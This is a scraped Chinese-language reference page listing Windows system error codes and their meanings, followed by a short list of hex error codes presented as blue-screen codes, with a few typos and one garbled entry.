1006 某文件的卷已在外部改变，因而打开的文件不再有效。
1007 要求的操作无法以全屏幕模式执行。
1008 试图引用并不存在的符号。
1009 配置注册表数据库已损坏。
1010 配置注册表主键无效。

1011 无法打开配置注册表主键。
1012 无法读取配置注册表主键。
1013 无法写入配置注册表主键。
1014 必须使用日志文件或其他副本来恢复注册表数据库中的某个文件。恢复成功。
1015 注册表已损坏。可能是一个包含注册表数据文件的结构已损坏，也可能内存中该文件的系统映像已损坏，或者因为备份副本（或日志）不存在（或损坏）导致无法恢复该文件。
1016 由注册表引起的 I/O 操作发生了不可恢复的错误。注册表将不能读取、写出或刷新包含注册表系统映像的其中一个文件。
1017 系统试图将文件加载或还原到注册表中，但是，指定的文件不是注册表文件格式。
1018 试图在注册表键（已经标记为删除）中完成的操作非法。
1019 系统无法在注册表日志文件中分配所需的空间。
1020 无法在已经有子键或键值的注册表项中创建符号链接。
1021 在易失的父键下不能创建固定的子键。
1022 通知的更改请求已经完成，并且返回信息还没有被送到调用者的缓冲区中。调用者需要列举所有文件以找到改动的内容。

1051 已将停止控制发送给与其他运行服务相关的服务。
1052 所要求的控制对此服务无效。
1053 服务没有及时地响应启动或控制请求。
1054 无法为该服务创建线程。
1055 服务数据库已锁定。
1056 该服务的实例已在运行。
1057 帐户名无效或者不存在，或者指定帐户名的密码无效。
1058 服务无法启动，可能因为被禁用，也可能因为没有关联的可用设备。
1059 已经指定了循环服务的从属关系。
1060 指定的服务不是所安装的服务。

1061 该服务此时无法接收控制消息。
1062 服务尚未启动。
1063 服务进程无法连接到服务控制程序。
1064 处理控制请求时，服务出现意外情况。
1065 指定的数据库不存在。
1066 服务返回服务特定的错误码。
1067 进程意外地终止。
1068 无法启动从属服务或组。
1069 由于登录失败，没有启动服务。
1070 启动后，服务保持在启动挂起状态。

1071 指定的服务数据库锁定无效。
1072 指定的服务已经标记为删除。
1073 指定的服务已经存在。
1074 系统当前正以上一次运行成功的配置运行。
1075 从属服务不存在，或已经标记为删除。
1076 已接受使用当前引导作为最后的有效控制设置。
1077 自从上一次启动以后，没有再次启动过该服务。
1078 该名称已经用作服务名或服务显示名。
1079 此服务的帐户不同于运行于同一进程上的其它服务的帐户。
1080 只能为 Win32 服务设置失败操作，不能为驱动程序设置。
1081 这个服务所运行的进程和服务控制管理器相同。所以，如果服务进程意外中止的话，服务控制管理器无法进行任何操作。
1082 这个服务没有设置恢复程序。
1083 配置成在该可执行程序中运行的这个服务不能执行该服务。
1100 已经到达磁带的物理尽头。

1101 磁带访问到文件标记。
1102 到达磁带或分区首部。
1103 磁带访问到文件组的末尾。
1104 磁带上没有其他数据。
1105 磁带无法分区。
1106 访问多重卷分区的新磁带时，当前的区块大小不正确。
1107 加载磁带时，找不到磁带分区信息。
1108 无法锁定媒体退出功能。
1109 无法卸载媒体。
1110 驱动器中的媒体已经更改。

1111 已经复位 I/O 总线。
1112 驱动器中没有媒体。
1113 在目标多字节代码页中不存在对单码字符的映射。
1114 动态链接库 (DLL) 初始化例程失败。
1115 正在关闭系统。
1116 无法终止系统关机，因为没有进行中的关机操作。
1117 由于 I/O 设备出现错误，无法运行该请求。
1118 串行设备初始化失败。将卸载串行驱动程序。
1119 无法打开正与其他设备共享中断请求 (IRQ) 的设备。至少有一个使用该 IRQ 的设备已经打开。
1120 由于再次写入串行口，串行 I/O 操作已结束。（IOCTL_SERIAL_XOFF_COUNTER 为零。）

1121 由于超时，串行 I/O 操作已结束。 (IOCTL_SERIAL_XOFF_COUNTER 未达到零。)
1122 在软盘上找不到标识符地址标记。
1123 软盘扇区标识符字段与软盘控制器磁道地址不匹配。
1124 软盘控制器报告软盘驱动程序不能识别的错误。
1125 软盘控制器返回的结果和注册的不一致。
1126 访问硬盘时，再校准操作失败，再试一次后也无法操作。
1127 访问硬盘时，磁盘操作失败，再试一次后仍没有作用。
1128 访问硬盘时，需要重启动磁盘控制器，但仍未成功。
1129 磁带已卷到尽头。
1130 可用的服务器存储区不足，无法执行该命令。

1131 检测到潜在的死锁情况。
1132 指定的基址或文件偏移量没有正确对齐。
1140 试图更改系统电源状态的操作被另一应用程序或驱动程序禁止。
1141 系统 BIOS 无法更改系统电源状态。
1142 试图在一文件上创建超过系统允许数额的链接。
1150 指定的程序需要新的 Windows 版本。

1151 指定的程序不是 Windows 或 MS-DOS 程序。
1152 无法启动指定程序的多个实例。
1153 指定的程序是为 Windows 的早期版本编写的。
1154 运行此应用程序所需的某个库文件已损。
1155 没有应用程序与该操作中所指定的文件关联。
1156 将命令发送到应用程序时出现错误。
1157 找不到运行此应用程序所需的某个库文件。
1158 当前进程已使用了 Window 管理器对象的系统允许的所有句柄。
1159 消息只能与同步操作一起使用。
1160 指出的源元素没有媒体。

1161 指出的目标元素已包含媒体。
1162 指出的元素不存在。
1163 指出的元素是未显示的存储资源的一部分。
1164 指出的设备需要重新初始化，因为硬件有错误。
1165 设备显示在尝试进一步操作之前需要清除。
1166 设备显示它的门仍是打开状态。
1167 设备没有连接。
1168 找不到元素。
1169 索引中没有同指定项相匹配的项。
1170 在对象上不存在指定的属性集。

1171 传递到 GetMouseMovePoints 的点不在缓冲区中。
1172 跟踪(工作站)服务没运行。
1173 找不到卷 ID。
1175 无法删除要被替换的文件。
1176 无法将替换文件移到要被替换的文件。要被替换的文件保持原来的名称。
1177 无法将替换文件移到要被替换的文件。要被替换的文件已被重新命名为备份名称。
1178 卷更改记录被删除。
1179 卷更改记录服务不处于活动中。
1180 找到一份文件，但是可能不是正确的文件。
1181 日志项已从日志中删除。
1200 指定的设备名无效。

1201 设备当前虽然未连接，但它是记忆连接。
1202 试图记起已经记住的设备。
1203 网络供应商不接受给定的网络路径。
1204 指定的网络供应商名无效。
1205 无法打开网络连接配置文件。
1206 网络连接配置文件已损坏。
1207 无法列举非包容类。
1208 出现扩展错误。
1209 指定组名的格式无效。
1210 指定计算机名的格式无效。

1211 指定事件名的格式无效。
1212 指定域名的格式无效。
1213 指定服务名的格式无效。
1214 指定网络名的格式无效。
1215 指定共享名的格式无效。
1216 指定密码的格式无效。
1217 指定的邮件名无效。
1218 指定邮件目的地的格式无效。
1219 所提供的凭据与现有凭据设置冲突。
1220 试图与网络服务器建立会话，但目前与该服务器建立的会话太多。

1221 网络上的其他计算机已经使用该工作组或域名。
1222 网络不存在或者没有启动。
1223 用户已经取消该操作。
1224 所要求的操作无法在已经打开用户映射区域的文件中运行。
1225 远程系统拒绝网络连接。
1226 已经关闭网络连接。
1227 网络传输的终点已经有一个地址与其关联。
1228 网络终点尚未与地址关联。
1229 试图在不存在的网络连接中操作。
1230 试图在活动的网络连接上进行无效操作。

1231 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1232 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1233 不能访问网络位置。有关网络疑难解答的信息，请参阅 Windows 帮助。
1234 远程系统的目标网络端点没有运行任何服务。
1235 该请求已经终止。
1236 本地系统已经终止网络连接。
1237 无法完成操作。请再试一次。
1238 无法创建到该服务器的连接，因为已经到达了该帐户同时连接的最大数目。
1239 试图在该帐户未授权的时间内登录。
1240 尚未授权此帐户从该站登录网络。

1241 网络地址无法用于要求的操作。
1242 服务已经注册。
1243 指定的服务不存在。
1244 由于尚未验证用户身份，无法执行要求的操作。
1245 由于用户尚未登录网络，无法运行要求的操作。指定的服务不存在。
1246 继续工作。
1247 完成初始化操作后，试图再次运行初始化操作。
1248 没有其他本地设备。
1249 指定的站点不存在。
1250 具有指定名称的域控制器已经存在。

1251 只有连接到服务器上时，才支持该操作。
1252 即使没有改动，组策略框架也应该调用扩展。
1253 指定的用户没有一个有效的配置文件。
1254 Microsoft Small Business Server 不支持此操作。
1300 不是对所有的调用方分配引用特权。

1301 帐户名与安全标识符之间的映射未完成。
1302 没有为该帐户明确地设置系统配额限制。
1303 没有可用的密钥。返回已知的密钥。
1304 密码太复杂，无法转换成 LAN Manager 密码。返回的 LAN Manager 密码是空字符串。
1305 修订级别未知。
1306 表示两个修订级别不兼容。
1307 无法将此安全标识符指定为该对象的拥有者。
1308 无法将此安全标识符指定为主要的对象组。
1309 当前并未模拟客户的线程试图操作模拟令牌。
1310 不可以禁用该组。

1311 目前没有可用的登录服务器处理登录请求。
1312 指定的登录会话不存在。该会话可能已终止。
1313 指定的权限不存在。
1314 客户不保留请求的权限。
1315 提供的名称不是正确的帐户名称格式。
1316 指定的用户已经存在。
1317 指定的用户不存在。
1318 指定的组已经存在。
1319 指定的组不存在。
1320 或者指定的用户帐户已经是某个特定组的成员，或者也可能指定的组非空而不能被删除。

1321 指定的用户帐户不是所指定组帐户的成员。
1322 上次保留的管理帐户无法关闭或删除。
1323 无法更新密码。所输入的密码不正确。
1324 无法更新密码。所提供的新密码包含不可用于密码的值。
1325 无法更新密码。为新密码提供的值不符合字符域的长度、复杂性或历史要求。
1326 登录失败: 用户名未知或密码错误。
1327 登录失败: 用户帐户限制。
1328 登录失败: 违反帐户登录时间限制。
1329 登录失败: 禁止用户登录到该计算机上。
1330 登录失败: 指定的帐户密码已过期。

1331 登录失败: 当前禁用帐户。
1332 未完成帐户名与安全性标识符之间的映射。
1333 一次请求的本地用户标识符(LUID)太多。
1334 没有其他可用的本地用户标识符(LUID)。
1335 对这个特定使用来说，安全标识符的子部分是无效的。
1336 访问控制清单(ACL)结构无效。
1337 安全标识符结构无效。
1338 安全描述符结构无效。
1340 无法创建继承的访问控制列表(ACL)或访问控制项目(ACE)。

1341 当前已禁用服务器。
1342 当前已启用服务器。
1343 所提供的值是无效的标识符授权值。
1344 没有更多的内存用于更新安全信息。
1345 指定的属性无效，或指定的属性与整个组的属性不兼容。
1346 或者没有提供所申请的模仿级别，或者提供的模仿级别无效。
1347 无法打开匿名级安全性符号。
1348 所请求的验证信息类别无效。
1349 该类符号不能以所尝试的方式使用。
1350 无法在没有相关安全性的对象上运行安全操作。

1351 未能从域控制器读取配置信息，或者是因为机器不可使用，或者是访问被拒绝。
1352 安全帐户管理程序(SAM)或本地安全颁发机构(LSA)服务器状态不正确，所以无法运行安全操作。
1353 域处于执行安全操作的错误状态。
1354 该操作只能在域的主域控制器中执行。
1355 指定的域不存在或联系不上。
1356 指定的域已经存在。
1357 试图超过每个服务器域数目的极限。
1358 由于严重的媒体错误或磁盘的数据结构损坏，无法完成所请求的操作。
1359 发生内部错误。
1360 通用的访问类型包含在访问掩码中，该掩码已经映射为非通用类型。

1361 安全性描述符的格式错误（绝对或自相关）。
1362 请求的操作只准登录进程使用。该调用过程并未被记录为登录进程。
1363 无法用已经使用的标识符来启动新的登录会话。
1364 指定的确认数据包未知。
1365 登录会话的状态与请求的操作不一致。
1366 登录会话标识符正在使用中。
1367 登录请求包含无效的登录类型值。
1368 在使用命名管道读取数据之前，无法经由该管道模拟。
1369 注册表子树的事务状态与所请求的操作不兼容。
1370 突发的内部安全性数据库故障。

1371 无法在内部帐户下运行该操作。
1372 无法在该内部特定组中运行该操作。
1373 无法在该内部特定用户中运行该操作。
1374 因为该组当前是用户的主要组，所以不能从此组中删除用户。
1375 该符号已作为主要符号使用。
1376 指定的本地组不存在。
1377 指定的帐户名不是本地组的成员。
1378 指定的帐户名已经是本地组的成员。
1379 指定的本地组已经存在。
1380 登录失败: 用户在本计算机上没有被授与所需注册类型。

1381 超过了可以存储在单个系统中的最大机密限制。
1382 机密的长度超过了最大允许值。
1383 本地安全授权数据库包含内部不一致的错误。
1384 登录时，用户的安全性上下文累积太多的安全标识符。
1385 登录失败: 用户在本计算机上没有被授与所需注册类型。
1386 经交叉加密的密码必须更改用户密码。
1387 成员不存在，因此无法将其添加到本地组或从中删除。
1388 新成员的帐户类型有误，因此无法将其添加到本地组。
1389 指定的安全标识符太多。
1390 经交叉加密的密码必须更改该用户密码。

1391 表示 ACL 没有可继承的组件。
1392 文件或目录已损坏，无法读取数据。
1393 磁盘结构已损坏，无法读取数据。
1394 指定的登录会话没有用户会话密钥。
1395 正在访问的服务允许特定数目的连接。因为连接的数目已达到服务可接受的数目，所以此时无法创建新的服务连接。
1396 登录失败: 该目标帐户名称不正确。
1397 相互身份验证失败。该服务器在域控制器的密码过期。
1398 在客户机和服务器之间有一个时间差。
1400 窗口句柄无效。

1401 菜单句柄无效。
1402 光标句柄无效。
1403 加速键表的句柄无效。
1404 挂接句柄无效。
1405 多重窗口位置结构句柄无效。
1406 无法创建最上层的子窗口。
1407 找不到窗口类。
1408 窗口无效；属于其他线程。
1409 已经注册热键。
1410 类已经存在。

1411 类不存在。
1412 类窗口仍打开着。
1413 索引无效。
1414 图标句柄无效。
1415 使用私人对话框窗口字。
1416 找不到列表框标识符。
1417 找不到任何通配符。
1418 线程没有打开剪贴板。
1419 尚未注册热键。
1420 该窗口不是有效的对话框窗口。

1421 找不到控制标识符。
1422 由于没有编辑控制，因此该组合框的消息无效。
1423 窗口不是组合框。
1424 高度必须小于 256。
1425 设备上下文(DC)句柄无效。
1426 挂接过程类型无效。
1427 挂接过程无效。
1428 不能在无模块句柄的情况下设置非本地的挂接。
1429 只能全局设置该挂接过程。
1430 已安装日记挂接过程。

1431 未安装挂接过程。
1432 单选列表框的消息无效。
1433 LB_SETCOUNT 发送到活动的列表框。
1434 该列表框不支持制表符。
1435 无法破坏由其他线程所创建的对象。
1436 子窗口不能有菜单。
1437 窗口没有系统菜单。
1438 消息框样式无效。
1439 系统范围内的(SPI_*)的参数无效。
1440 屏幕已经锁定。

1441 多重窗口位置结构中所有窗口句柄必须具有相同的父窗口。
1442 窗口不是子窗口。
1443 GW_* 命令无效。
1444 线程标识符无效。
1445 无法处理非多文档接口(MDI)窗口的消息。
1446 弹出式菜单已激活。
1447 窗口没有滚动条。
1448 滚动条范围不能大于 MAXLONG。
1449 无法以指定的方式显示或关闭窗口。
1450 系统资源不足，无法完成所请求的服务。

1451 系统资源不足，无法完成所请求的服务。
1452 系统资源不足，无法完成所请求的服务。
1453 配额不足，无法完成请求的服务。
1454 配额不足，无法完成请求的服务。
1455 页面交换文件太小，无法完成此项操作。
1456 找不到菜单项。
1457 键盘布局句柄无效。
1458 不允许使用挂钩类型。
1459 该操作需要交互式窗口工作站。
1460 由于超时时间已过，该操作返回。
1461 无效监视器句柄。
1500 事件日志文件已损坏。
1501 无法打开事件日志文件，因此无法启动事件记录服务。
1502 事件日志文件已满。
1503 事件日志文件在两次读取操作间已发生变化。
1601 无法访问 Windows 安装服务。请与技术支持人员联系，确认 Windows 安装服务是否注册正确。
1602 用户取消了安装。
1603 安装时发生严重错误。
1604 安装已挂起，未完成。
1605 这个操作只对当前安装的产品有效。
1606 功能 ID 未注册。
1607 组件 ID 未注册。
1608 未知属性。
1609 句柄处于不正确的状态。
1610 这个产品的配置数据已损坏。请与技术支持人员联系。

1611 组件限制语不存在。
1612 这个产品的安装来源无法使用。请验证来源是否存在，是否可以访问。
1613 Windows 安装服务无法安装这个安装程序包。您必须安装含有 Windows 安装服务新版本的 Windows Service Park。
1614 产品已卸载。
1615 SQL 查询语法不正确或不被支持。
1616 记录字符域不存在。
1617 设备已被删除。
1618 正在进行另一个安装操作。请在继续这个安装操作之前完成那个操作。
1619 未能打开这个安装程序包。请验证程序包是否存在，是否可以访问；或者与应用程序供应商联系，验证这是否是有效的 Windows 安装程序包。
1620 未能打开这个安装程序包。请与应用程序供应商联系，验证这是否是有效的 Windows 安装程序包。

1621 启动 Windows 安装服务用户界面时有错误。请与技术支持人员联系。
1622 打开安装日志文件时出错。请验证指定的日志文件位置是否存在，是否可以写入。
1623 安装程序包的语言不受系统支持。
1624 应用变换时出错。请验证指定的变换路径是否有效。
1625 系统策略禁止这个安装。请与系统管理员联系。
1626 无法执行函数。
1627 执行期间，函数出了问题。
1628 指定了无效的或未知的表格。
1629 提供的数据类型不对。
1630 这个类型的数据不受支持。

1631 Windows 安装服务未能启动。请与技术支持人员联系。
1632 临时文件夹已满或无法使用。请验证临时文件夹是否存在，是否可以写入。
1633 这个处理器类型不支持该安装程序包。请与产品供应商联系。
1634 组件没有在这台计算机上使用。
1635 无法打开修补程序包。请验证修补程序包是否存在，是否可以访问；或者与应用程序供应商联系，验证这是否是有效的 Windows 安装修补程序包。
1636 无法打开修补程序包。请与应用程序供应商联系，验证这是否是有效的 Windows 安装修补程序包。
1637 Windows 安装服务无法处理这个修补程序包。您必须安装含有 Windows 安装服务新版本的 Windows Service Pack。
1638 已安装这个产品的另一个版本。这个版本的安装无法继续。要配置或删除这个产品的现有版本，请用“控制面板”上的“添加/删除程序”。
1639 无效的命令行参数。有关详细的命令行帮助，请查阅 Windows 安装服务的 SDK。
1640 在终端服务远程会话期间，只有管理员有添加、删除或配置服务器软件的权限。如果您要在服务器上安装或配置软件，请与网络管理员联系。
1641 要求的操作已成功结束。要使改动生效，必须重新启动系统。
1642 Windows 安装服务无法安装升级修补程序，因为被升级的程序丢失，或者升级修补程序将更新此程序的其他版本。请确认要被升级的程序在您的计算机上且您的升级修补程序是正确的。
1700 串绑定无效。

1701 绑定句柄的类型错误。
1702 绑定句柄无效。
1703 不支持 RPC 协议顺序。
1704 RPC 协议序列无效。
1705 字符串的全球唯一标识符(UUID)无效。
1706 终点的格式无效。
1707 网络地址无效。
1708 未找到终点。
1709 超时设置值无效。
1710 找不到该对象的全球唯一标识符(UUID)。

1711 该对象的全球唯一标识符(UUID)已经注册。
1712 这一类型的全球唯一标识符(UUID)已经注册。
1713 RPC 服务器正在监听。
1714 尚未注册协议顺序。
1715 RPC 服务器不处于监听状态。
1716 管理程序的类型未知。
1717 接口未知。
1718 没有绑定。
1719 没有协议序列。
1720 无法创建终点。

1721 资源不足，无法完成该操作。
1722 RPC 服务器无法使用。
1723 RPC 服务器太忙，无法完成此项操作。
1724 网络选项无效。
1725 该线程中不存在活动的远程过程调用。
1726 远程过程调用失败。
1727 远程过程调用失败并且无法执行。
1728 远程过程调用(RPC)协议出现错误。
1730 RPC 服务器不支持传输语法。

1732 不支持这种类型的全球唯一标识符。
1733 标识无效。
1734 数组边界无效。
1735 绑定类型中不包含项目名。
1736 名称语法无效。
1737 不支持这种命名语法。
1739 没有可用的网络地址，无法创建全球唯一标识符(UUID)。
1740 终结点重复。

1741 身份验证类型未知。
1742 调用次数的上限太小。
1743 字符串太长。
1744 找不到 RPC 协议序列。
1745 过程号超出范围。
1746 此次绑定不包含任何身份验证信息。
1747 身份验证服务未知。
1748 身份验证级别未知。
1749 安全描述符无效。
1750 身份验证服务未知。

1751 项目无效。
1752 服务器的终结点无法执行此项操作。
1753 终点的映射器没有更多的终点可用。
1754 没有导出任何接口。
1755 项目名不完整。
1756 版本选项无效。
1757 没有其他成员。
1758 可以导出全部内容。
1759 未找到接口。
1760 项目已经存在。

1761 项目找不到。
1762 名称服务不可用。
1763 网络地址集无效。
1764 不支持请求的操作。
1765 没有可供冒仿的安全性描述符。
1766 远程过程调用(RPC)出现内部错误。
1767 RPC 服务器企图进行整除零运算。
1768 RPC 服务器出现寻址错误。
1769 RPC 服务器中的浮点运算造成被零除。
1770 RPC 服务器产生了浮点下溢错误。

1771 RPC 服务器产生了浮点上溢错误。
1772 可用于自动句柄绑定的 RPC 服务器列表已经用完。
1773 无法打开字符转换表文件。
1774 包含字符转换表的文件小于 512 个字节。
1775 在远程过程调用中，客户机向主机传送了一个空的描述体句柄。
1777 远程过程调用中的描述体句柄发生变化。
1778 发送到远程过程调用的绑定句柄不匹配。
1779 占位程序无法获得远程过程调用的句柄。
1780 将空的参考指针发送给占位程序。

1781 列举值超出范围。
1782 字节数目太小。
1783 占位程序接收到错误数据。
1784 所提供的用户缓冲区对所申请的操作无效。
1785 无法识别磁盘媒体。它可能还未格式化。
1786 工作站没有信任密码。
1787 服务器上的安全数据库中没有该工作站信任关系的计算机帐户。
1788 建立主域和受托域间的信任关系失败。
1789 建立工作站和主域间的信任关系失败。
1790 网络登录失败。

1791 该线程执行过程中已经进行了远程过程调用。
1792 试图登录网络，但网络登录服务尚未启动。
1793 用户帐户已到期。
1794 重定向程序正在使用，无法卸载。
1795 已经安装所指定的打印机驱动程序。
1796 指定的端口未知。
1797 打印机驱动程序未知。
1798 打印处理程序未知。
1799 指定的分隔符文件无效。
1800 指定的优先级无效。

1801 打印机名无效。
1802 打印机已经存在。
1803 打印机命令无效。
1804 指定的数据类型无效。
1805 指定的环境无效。
1806 没有其他绑定。
1807 使用的帐户是跨网络的信任帐户。请使用全局用户帐户或本地用户帐户来访问此服务器。
1808 所使用的帐户是计算机帐户。请使用全局用户帐户或本地用户帐户来访问该服务器。
1809 使用的帐户是服务器信任帐户。请使用全局用户帐户或本地用户帐户来访问该服务器。
1810 指定的域名或安全标识符与域的信任信息不一致。

1811 服务器正在使用中，无法卸载。
1812 指定的映像文件不包含资源部分。
1813 在映像文件中找不到指定的资源类型。
1814 在映像文件中找不到指定的资源名称。
1815 在映像文件中找不到指定的资源语言 ID 。
1816 可用的配额不足，无法执行该命令。
1817 没有已注册的接口。
1818 远程过程调用被取消。
1819 绑定句柄不包含所有需要的信息。
1820 远程调用过程中发生通讯失败。

1821 所需的身份验证级别不被支持。
1822 主要的名称没有注册。
1823 指定的错误不是有效的 Windows RPC 错误代码。
1824 已分配仅在本机上有效的 UUID。
1825 产生了特定的安全包错误。
1826 没有取消线程。
1827 在编码/解码处理时的操作无效。
1828 序列化软件包的版本不兼容。
1829 RPC 占位程序的版本不兼容。
1830 RPC 管道对象无效或已损坏。

1831 试图在 RPC 管道对象上进行无效操作。
1832 不被支持的 RPC 管道版本。
1898 找不到组成员。
1899 无法创建终结点映射数据库条目。
1900 对象的全球标识符(UUID)为空。

1901 指定的时间无效。
1902 指定的表单名无效。
1903 指定的表单大小无效。
1904 指定的打印机句柄正在等候处理
1905 指定的打印机已经删除。
1906 打印机的状态无效。
1907 用户首次登录前，必须先更改其密码。
1908 找不到该域的域控制器。
1909 引用的帐户目前被锁定，可能无法登录。
1910 没有发现指定的此对象导出者。

1911 没有发现指定的对象。
1912 没有发现指定的对象解析器。
1913 一些待发数据仍停留在请求缓冲区内。
1914 无效的异步远程过程调用句柄。
1915 这个操作的异步 RPC 调用句柄不正确。
1916 RPC 管道对象已经关闭。
1917 RPC 调用在全部的管道都被处理之前完成。
1918 没有其他可用的数据来自 RPC 管道。
1919 这个机器没有可用的站点名。
1920 系统无法访问此文件。

1921 系统无法解析文件名。
1922 项目不是所要的类型。
1923 无法将所有对象的 UUID 导出到指定的项。
1924 无法将接口导出到指定的项。
1925 无法添加指定的配置文件项。
1926 无法添加指定的配置文件元素。
1927 无法删除指定的配置文件元素。
1928 无法添加组元素。
1929 无法删除组元素。
2000 像素格式无效。

2001 指定的驱动程序无效。
2002 该操作的窗口样式或类属性无效。
2003 不支持请求的图元文件操作。
2004 不支持肭蟮淖徊僮鳌?nbsp;
2005 不支持请求的剪辑操作。
2010 指定的颜色管理模块无效。

2011 指定的颜色文件配置无效。
2012 找不到指定的标识。
2013 所需的标识不存在。
2014 指定的标识已经存在。
2015 指定的颜色文件配置与任何设备都不相关。
2016 找不到该指定的颜色文件配置。
2017 指定的颜色空间无效。
2018 图像颜色管理没有启用。
2019 在删除该颜色转换时有一个错误。
2020 指定的颜色转换无效。

2021 指定的转换与位图的颜色空间不匹配。
2022 指定的命名颜色索引在配置文件中不存在。
2108 网络连接已成功，但需要提示用户输入一个不同于原始指定的密码。
2202 指定的用户名无效。
2250 网络连接不存在。

2401 在这个网络连接上已存在打开的文件或未处理的请求。
2402 活动的连接仍然存在。
2404 设备正由活动进程使用，无法断开连接。

3000 指定的打印监视程序未知。
3001 指定的打印机驱动程序正在使用中。
3002 找不到假脱机文件。
3003 没有发出 StartDocPrinter 调用。
3004 尚未发出 AddJob 调用。
3005 指定的打印处理程序已经安装。
3006 指定的打印监视程序已经安装。
3007 该指定的打印监视器不具备所要求的功能。
3008 指定的打印机监视器正在使用中。
3009 当打印机有作业排成队列时此操作请求是不允许的。
3010 请求的操作成功。只有重新启动系统，更改才会生效。

3011 请求的操作成功。只有重新启动服务，更改才会生效。
3012 找不到打印机。
4000 WINS 在处理命令时遇到执行错误。
4001 无法删除本地的 WINS。
4002 从文件引入失败。
4003 备份失败。以前执行过完整的备份吗?
4004 备份失败。请检查备份数据库的目标目录。
4005 名称在 WINS 数据库中不存在。
4006 不允许进行未配置部分的复制。
4100 DHCP 客户获得一个在网上已被使用的 IP 地址。直到 DHCP 客户可以获得新的地址前，本地接口将被禁用。
4200 WMI 数据提供程序不能识别传来的 GUID 是否有效。

4201 WMI 数据提供程序无法识别传来的实例名是否有效。
4202 WMI 数据提供程序无法识别传来的数据项目标识符是否有效。
4203 无法完成 WMI 请求，请重试一次。
4204 找不到 WMI 数据提供程序。
4205 WMI 数据提供程序引用到一个未注册的实例组。
4206 WMI 数据块或事件通知已启用。
4207 WMI 数据块不再可用。
4208 WMI 数据服务无法使用。
4209 WMI 数据提供程序无法完成请求。
4210 WMI MOF 信息无效。

4211 WMI 注册信息无效。
4212 WMI 数据块或事件通知已禁用。
4213 WMI 数据项目或数据块为只读。
4214 WMI 数据项目或数据块不能更改。
6118 该工作组的服务器列表当前不可用。
6200 要正常运行，任务计划程序服务的配置必须在系统帐户中运行。单独的任务可以被配置成在其他帐户中运行。

7001 指定的会话名无效。
7002 指定的协议驱动程序无效。
7003 在系统路径上找不到指定的协议驱动程序。
7004 在系统路径上找不到指定的终端连接驱动程序。
7005 不能为这个会话创建一个事件日志的注册键。
7006 同名的一个服务已经在系统中存在。
7007 在会话上一个关闭操作挂起。
7008 没有可用的输出缓冲器。
7009 找不到 MODEM.INF 文件。
7010 在 MODEM.INF 中没有找到调制解调器名称。

7011 调制解调器没有接受发送给它的指令。验证配置的调制解调器与连接的调制解调器是否匹配。
7012 调制解调器没有响应发送给它的指令。验证该调制解调器是否接线正确并且打开了电源开关。
7013 由于断开连接，载波检测失败或载波停止。
7014 在要求的时间内没有发现拨号音。确定电话线连接正确并可使用。
7015 在远程站点回叫时检测到了占线信号。
7016 在回叫时远程站点上检测到了声音。
7017 传输驱动程序错误

7022 找不到指定的会话。
7023 指定的会话名称已处于使用中。
7024 由于终端连接目前正在忙于处理一个连接、断开连接、复位或删除操作，无法完成该请求的操作。
7025 试图连接到其视频模式不受当前客户支持的会话。
7035 应用程序尝试启动 DOS 图形模式。不支持 DOS 图形模式。
7037 您的交互式登录权限已被禁用。请与您的管理员联系。
7038 该请求的操作只能在系统控制台上执行。这通常是一个驱动程序或系统 DLL 要求直接控制台访问的结果。
7040 客户未能对服务器连接消息作出响应。

7041 不支持断开控制台会话。
7042 不支持重新将一个断开的会话连接到控制台。
7044 远程控制另一个会话的请求被拒绝。
7045 拒绝请求的会话访问。
7049 指定的终端连接驱动程序无效。
7050 不能远程控制请求的会话。这也许是由于该会话被中断或目前没有一个用户登录。另外，您不能从该系统控制台远程控制一个会话或远程控制系统控制台。并且，您不能远程控制您自己的当前会话。

7051 该请求的会话没有配置成允许远程控制。
7052 连接到这个终端服务器的申请被拒绝。终端服务器客户许可证目前正在被另一个用户使用。请与系统管理员联系，获取一份新的终端服务器客户，其许可证号码必须是有效的、唯一的。
7053 连接到这个终端服务器的申请被拒绝。还没有为这份终端服务器客户输入您的终端服务器客户许可证号码。请与系统管理员联系，为该终端服务器客户输入一个有效的、唯一的许可证号码。
7054 系统已达到其授权的登录限制。请以后再试一次。
7055 您正在使用的客户没有使用该系统的授权。您的登录请求被拒绝。
7056 系统许可证已过期。您的登录请求被拒绝。


Windows蓝屏代码

《一键清理系统垃圾》

Windows蓝屏代码

使用Windows出现蓝色屏幕是经常的事，而且每每因为不清楚错误的来源而频繁重新安装系统，劳神费时。下列收集了一些Windows死机密码，供大家参考。
0x0000 操作完成

0x0001 不正确的函数

0x0002 系统找不到指定的文件

0x0003 系统找不到指定的路径

0x0004 系统无法打开文件

0x0005 拒绝存取

0x0006 无效的代码

0x0007 内存控制模块已损坏

0x0008 内存空间不足，无法处理这个指令

0x0009 内存控制模块地址无效

0x000a 环境不正确

0x000b 尝试载入一个格式错误的程序

0x000c 存取码错误

0x000d 资料错误

0x000e 内存空间不够，无法完成这项操作

0x000f 系统找不到制定的硬盘

0x0010 无法移除目录

0x0011 系统无法将文件移到其他的硬盘

0x0012 没有任何文件

0x0019 找不到指定的扇区或磁道

0x001a 指定的磁盘或磁片无法存取

0x001b 磁盘找不到要求的扇区

0x001c 打印机没有纸

0x001d 系统无法将资料写入制定的磁盘

0x001e 系统无法读取指定的装置

0x001f 连接到系统的某个装置没有作用

0x0021 文件的一部分被锁定

0x0024 开启的分享文件数量太多

0x0026 到达文件结尾

0x0027 磁盘已满

0x0036 网络繁忙

0x003b 网络发生意外的错误

0x0043 网络名称找不到

0x0050 文件已经存在

0x0052 无法建立目录或文件

0x0053 int24失败

0x006b 因为代用的磁盘尚未插入，所以程序已经停止

0x006c 磁盘正在使用中或被锁定

0x006f 文件名太长

0x0070 硬盘空间不足

0x007f 找不到指定的程序

0x045b 系统正在关机

0x045c 无法种植系统关机，因为没有关机的动作在进行中

0x046a 可用服务器储存空间不足，无法处理这项指令

0x047e 指定的程序需要新的Windows版本

0x047f 指定的程序不是Windows或MS-DOS程序

0x0480 指定的程序已经启动，无法再启动一次

0x0481 指定的程序是为旧版的Windows所写的

0x0482 执行此应用程序所需的程序库文件之一毁坏

0x0483 没有应用程序与此项操作的指定文件建立关联

0x0484 传送指令到应用程序发生错误

0x04b0 指定的装置名称无效

0x05a2 窗口不是子窗口

0x05aa 系统资源不足，无法完成所要求的服务

0x05ab 系统子还不足，无法完成所需要的服务

0x05ac 系统资源不足，无法完成所要求的服务

0x06b9 资源不足，无法完成操作


Windows蓝屏代码含意速查表

《一键清理系统垃圾》

Windows蓝屏代码含意速查表

[color=Red]代码含意[/color]
